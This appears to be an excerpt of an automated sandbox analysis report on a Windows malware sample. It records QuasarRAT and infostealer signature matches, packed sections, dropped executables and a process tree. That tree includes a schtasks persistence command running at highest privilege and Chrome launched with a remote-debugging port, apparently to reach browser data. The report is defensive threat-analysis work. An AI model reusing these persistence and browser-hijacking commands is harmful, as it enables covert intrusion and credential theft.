Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C521990	1_2_6C521990
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C461980	1_2_6C461980
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5D9A50	1_2_6C5D9A50
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C48FA10	1_2_6C48FA10
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C54DA30	1_2_6C54DA30
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C451AE0	1_2_6C451AE0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C52DAB0	1_2_6C52DAB0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C52FB60	1_2_6C52FB60
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C49BB20	1_2_6C49BB20
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C497BF0	1_2_6C497BF0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C535B90	1_2_6C535B90
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C441B80	1_2_6C441B80
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C519BB0	1_2_6C519BB0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4A9BA0	1_2_6C4A9BA0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4DD410	1_2_6C4DD410
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C539430	1_2_6C539430
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4514E0	1_2_6C4514E0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C5D14A0	1_2_6C5D14A0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C59F510	1_2_6C59F510
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B7500	1_2_6C4B7500
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C465510	1_2_6C465510
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4D55F0	1_2_6C4D55F0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C489590	1_2_6C489590
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4A5640	1_2_6C4A5640
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C469650	1_2_6C469650

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: String function: 6C589F30 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: String function: 6C4AC5E0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: String function: 6C473620 appears 95 times
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: String function: 6C479B10 appears 105 times

Source: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3180 -s 88

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 28.2.28qbTrm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 28.2.28qbTrm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 28.2.28qbTrm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 26.2.28qbTrm.exe.4219970.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 26.2.28qbTrm.exe.4219970.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 26.2.28qbTrm.exe.4219970.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 26.2.28qbTrm.exe.4219970.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 26.2.28qbTrm.exe.4219970.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 26.2.28qbTrm.exe.4219970.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer

Source: random.exe	Static PE information: Section: ZLIB complexity 0.9999768860946746
Source: random.exe	Static PE information: Section: durkfvqt ZLIB complexity 0.9946372022906553
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: Section: dmhigkdj ZLIB complexity 0.9949293522306267
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: Section: xuipkqse ZLIB complexity 0.9944062309857012
Source: skotes.exe.3.dr	Static PE information: Section: xuipkqse ZLIB complexity 0.9944062309857012
Source: spoDnGT[1].exe.11.dr	Static PE information: Section: yfwtsime ZLIB complexity 0.9946792763157895
Source: spoDnGT.exe.11.dr	Static PE information: Section: yfwtsime ZLIB complexity 0.9946792763157895
Source: kzTq7Bt[1].exe.11.dr	Static PE information: Section: wdhelxkr ZLIB complexity 0.9942754782796318
Source: kzTq7Bt.exe.11.dr	Static PE information: Section: wdhelxkr ZLIB complexity 0.9942754782796318
Source: GWZ8arC[1].exe.11.dr	Static PE information: Section: .iat ZLIB complexity 1.0003346565731166
Source: GWZ8arC.exe.11.dr	Static PE information: Section: .iat ZLIB complexity 1.0003346565731166

Source: 28qbTrm[1].exe.11.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: 28qbTrm.exe.11.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: GWZ8arC[1].exe.11.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: GWZ8arC.exe.11.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: 19.2.GWZ8arC.exe.3999550.0.raw.unpack, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: services.exe.28.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@72/101@9/13

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Code function: 1_2_6C4B0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

1_2_6C4B0300

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\HHNO5PO7.htm

Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3180
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7112
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7388
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\6596bd7c-1ad4-4c84-8564-65c9aa359b6d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Mutant created: \Sessions\1\BaseNamedObjects\9ad05bc1-e44b-4d4e-9f5b-78f9f63b67b7
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7712

Source: C:\Users\user\Desktop\random.exe

File created: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Jump to behavior

Source: Yara match	File source: 45.2.TiVoServer.exe.40000000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002D.00000002.2887868167.0000000040001000.00000020.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\Rtl60.bpl, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Servicewriter\Rtl60.bpl, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159648203.000000006C5DF000.00000002.00000001.01000000.0000000D.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159221146.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2153684352.0000000005C45000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159648203.000000006C5DF000.00000002.00000001.01000000.0000000D.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159221146.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2153684352.0000000005C45000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159648203.000000006C5DF000.00000002.00000001.01000000.0000000D.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159221146.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2153684352.0000000005C45000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159648203.000000006C5DF000.00000002.00000001.01000000.0000000D.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159221146.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2153684352.0000000005C45000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: K1T78D2510W1E77KV3WDUQ9M.exe, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159648203.000000006C5DF000.00000002.00000001.01000000.0000000D.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159221146.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2153684352.0000000005C45000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159648203.000000006C5DF000.00000002.00000001.01000000.0000000D.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159221146.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2153684352.0000000005C45000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159221146.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2153684352.0000000005C45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: random.exe, 00000000.00000003.1712375678.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1712778624.00000000059F5000.00000004.00000800.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000003.2032789870.0000000005AE9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159221146.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2153684352.0000000005C45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159221146.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2153684352.0000000005C45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: random.exe	Virustotal: Detection: 59%
Source: random.exe	ReversingLabs: Detection: 56%

Source: K1T78D2510W1E77KV3WDUQ9M.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\user\Desktop\random.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe "C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe "C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe"
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 --field-trial-handle=2324,i,12189002224667484218,16201993814704209176,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe "C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe"
Source: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3180 -s 88
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 844
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe "C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe"
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process created: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe "C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe"
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 820
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\services.exe "C:\Users\user\AppData\Roaming\SubDir\services.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\services.exe "C:\Users\user\AppData\Roaming\SubDir\services.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\services.exe "C:\Users\user\AppData\Roaming\SubDir\services.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7388 -s 832
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe "C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe"
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Process created: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe "C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe" -burn.filehandle.attached=528 -burn.filehandle.self=648
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Process created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe "C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe "C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe"	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe "C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 --field-trial-handle=2324,i,12189002224667484218,16201993814704209176,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe "C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe "C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe"	Jump to behavior
